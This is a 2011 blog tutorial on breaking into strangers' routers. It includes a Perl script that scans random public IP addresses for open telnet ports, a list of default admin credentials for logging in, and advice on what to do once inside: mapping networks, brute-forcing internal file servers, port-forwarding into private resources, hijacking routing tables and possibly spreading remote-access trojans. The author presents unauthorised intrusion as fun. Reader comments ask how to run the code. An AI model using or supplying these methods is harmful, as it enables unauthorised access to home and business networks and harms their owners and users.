Friday, January 21, 2011

Hack Router For Exploration

 REMOTE ROUTER HACKING
Introduction
Ok, Basically this tutorial deals with how to scan large amounts of addresses for telnet services, which we can then attempt to use default credentials to log in with surprising success.

Why Telnet? Isn't That Dead Now?
Your partly correct, telnet is dead now, it was superseded by SSH because telnet sends packets in plain text where as SSH encrypts packets. But telnet is still very much used on routers for simple administration by low tech management systems that come packaged with alot of off the shelf routers. Some of these routers allow remote clients to connect to telnet as well as local users - these are the boxes that we are looking for.

So what do i need ?
You'll need to run this perl script, (written by me, found below), this simply generates a random IP address, if the IP is in a scannable class (ie not a private, experimental or loop back address) the programme attempts to open a connection to the telnet port (23) of the random ip, if it succeeds the program logs the success in a local file for later analysis. The program then repeats -- so if you run a few instances of the program for a few hours you can end up with a list of around 200 telnet servers - ive left mine overnight before and collected 880 servers before.


Code:
#!/usr/bin/perl
use IO::Socket;
########################### IP GENERATOR ########################
sub ipgen(){
my $range1 = 223;                        #avoid experimental and multicast
my $range2 = 254;              
$oct1 = int(rand($range1)) + 1;                    #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen();                            #if local or private call again
}else{
$ip = "$oct1.$oct2.$oct3.$oct4";                # otherwise allocate the ip to return
}
return $ip;                            #return to caller      
}
#################################################################
############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";
while(1==1){                            # keeps code running indefinatly
$target = &ipgen();                        # get random ip to scan
print "*??* SCANNING: $target \n";                    # output
my $sock = new IO::Socket::INET (                # try to create socket to chose random address
                 PeerAddr => $target,
                 PeerPort => '23',        # change this number to change ports you want to detect
                 Proto => 'tcp',
                 Timeout => '3',         # you can get away with a timeout of 1 second but i have 2 to be safe
                 );
if($sock){                            # if socket opened (port open)
print "*!!* SUCCESS-: $target \n";                # print to screen
open(DAT, ">>telnet.txt") || die("Cannot Open Output File");     # open results file
print DAT "SUCCESS: $target \n";                # append findings to end of file
close(DAT);                            # close the file
}
close($sock);                            # close the socket
}################################################################

Youll also need need a telnet client - I recommend you use putty because it supports proxys, but you are dealing with people who dont know how to change there router passwords so you shouldnt be too worried so you can use the defauly OS telnet client - for windows XP/linux users you will already have one - for windows 7 users you will need to enable yours with this tutorial .

Ok - I'm Set Up - So Now What?
Youll need to start a few instances of the perl script, you can make your desktop look pretty like mine below if you wish.

[Image: 4185786.png]

You can just run one but it will take longer to get a decent sized list of servers. I run 5 for around half an hour and that gives me a list of around 50 telnet boxes.

Ok now you have your list of IP's with the telnet port open (called telnet.txt in the same directory as your perl script), what you need to do is take your telnet client and just start connecting to them, - you will be prompted for a username + password.

This is where it gets fun - because alarge amount of routers ship with default accounts - here are the most common.

Username:Password
_________________
admin : admin
admin : (blank password)
root : (blank)
root : root

To be honest alot of routers disclose there model number in the telnet banner when you connect so a simple google search often turns up the default username and password. Otherwise i try the top 3 and usually get disconnected and move on to the next in my list.

You will find out quiet fast how many ip's in your list you can actually log into with full admin rights

[Image: 4185900.png]
Who Exactly Am I Hacking?
This is half the fun for me - you dont really know - if your interested you can just do a quick whois -but around 90% of the time your dealing with home routers that people have bought from a shop and not configured properly but i have found business and offices that have succumb to the same laziness as the home user so the possibilities are endless.

Ok now what ?
From here its up to you what you do, but i enjoy using simple network tools like ipconfig and ping to map out the network, sometimes i have found routers that have nmap and telnet clients on etc. Today i found one that let me download any C code onto it i wanted - almost every router OS is different so some take a while to get used to what commands you can run but it is alot of fun finding out peoples network layout, i have compromised routers, made my way into the internal file servers of the network using brute forcers, or setting up port forwarding on the router to give me access externally to otherwise private internal resources - you can even port forward packets to printers and use them across the internet to print out hundreds of copys of the dictionary or what ever literature tickles your pickle.

A funny concept that i have got to work in the past is fucking with the routing tables and redirecting every web request to gay porn sites. So I would imagine that this could be useful for people trying to get RAT's spread, especially if you find a router with upwards of 100 PC's behind the router - but i dont deal much with rat's and botnets so dont quote me on that.

A Small Aside.

Ill be happy if a few people read this tutorial and explore a few networks because thats what used to drive hacking forwards, and its what used to motivate hackers, the thrill of exploring the unknown, the chance of coming across a really large network to explore and further your knowledge and skills of systems. I think people focus too much on making money from hacking, or getting there best friends fu**book password and the real fun somehow has been lost in the past 10 years to a new generation of kids that just want everything now. Lets keep some of the old skills and knowledge alive and not let it be lost in the archives of long since abandoned forums and irc rooms.

Thanks For Reading - Happy Hacking.
Special Thanks To SOLARIS
.........................................................................................................................................................................................................
.........................................................................................................................................................................................................

4 comments:

  1. Hi Adnan,

    Its giving error when i run this Perl script

    "" C:\t>router.pl
    syntax error at C:\t\router.pl line 3, near "use IO::Socket"
    Execution of C:\t\router.pl aborted due to compilation errors. ""

    ReplyDelete
  2. This is such a great post, and was thinking much the same myself. Another great update.
    MAC Address Software

    ReplyDelete
  3. Where do i put the codes? Thanks

    ReplyDelete
  4. Where do i put the code sir? Thanks

    ReplyDelete